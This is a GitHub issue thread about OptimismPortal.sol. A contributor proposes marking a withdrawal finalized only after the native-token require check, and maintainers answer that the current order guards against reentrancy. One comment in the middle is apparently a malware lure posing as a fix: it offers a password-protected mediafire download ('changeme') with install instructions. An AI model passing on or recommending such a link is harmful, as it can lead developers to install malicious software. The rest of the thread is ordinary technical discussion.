### ISSUE TITLE
Recommendation: In OptimismPortal.sol put finalizedWithdrawals after require check

### ISSUE THREAD

**Issue by NegruGeorge** [tokamak-network/tokamak-thanos#230]
**Recommendation**:

 The check to prevent direct calls to the native token contract can be done before marking the withdrawal finalized.
 
 Before code:
 ```
 address _nativeTokenAddress = systemConfig.nativeTokenAddress();

        // Mark the withdrawal as finalized so it can't be replayed.
        finalizedWithdrawals[withdrawalHash] = true;

        // Not allow to call native token contract because users can transfer all token out of the contract
        require(
            _tx.target != _nativeTokenAddress, "Optimism Portal: cannot make a direct call to native token contract"
        );
```
       
 After code ( this is how it was done before in the contract) :

```
 address _nativeTokenAddress = systemConfig.nativeTokenAddress();
        // Not allow to call native token contract because users can transfer all token out of the contract
        require(
            _tx.target != _nativeTokenAddress, "Optimism Portal: cannot make a direct call to native token contract"
        );
        
         // Mark the withdrawal as finalized
        finalizedWithdrawals[withdrawalHash] = true;
```

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by nguyenzung** [comment]
Could you explain more @NegruGeorge 

I dont really understand the benefit of the proposed code.

**Comment by NegruGeorge** [comment]
Is just to have the finalizedWithdrawals set to true after the require, not before.

**Comment by NegruGeorge** [comment]
@nguyenzung

**Comment by NegruGeorge** [comment]
While it doesn’t reduce gas costs for successful transactions, it could slightly improve gas efficiency in cases where the transaction fails, as it avoids unnecessary storage writes before reverting.

**Comment by boohyung** [comment]
I think the current code is better than your suggestion on security. By first setting a flag `finalizedWithdrawals[withdrawalHash] = true` to indicate that the withdrawal is complete, and then performing certain require, we can avoid security vulnerabilities due to reentrancy attacks and other state inconsistencies.

**Comment by boohyung** [comment]
@NegruGeorge Could you check and closing this issue?
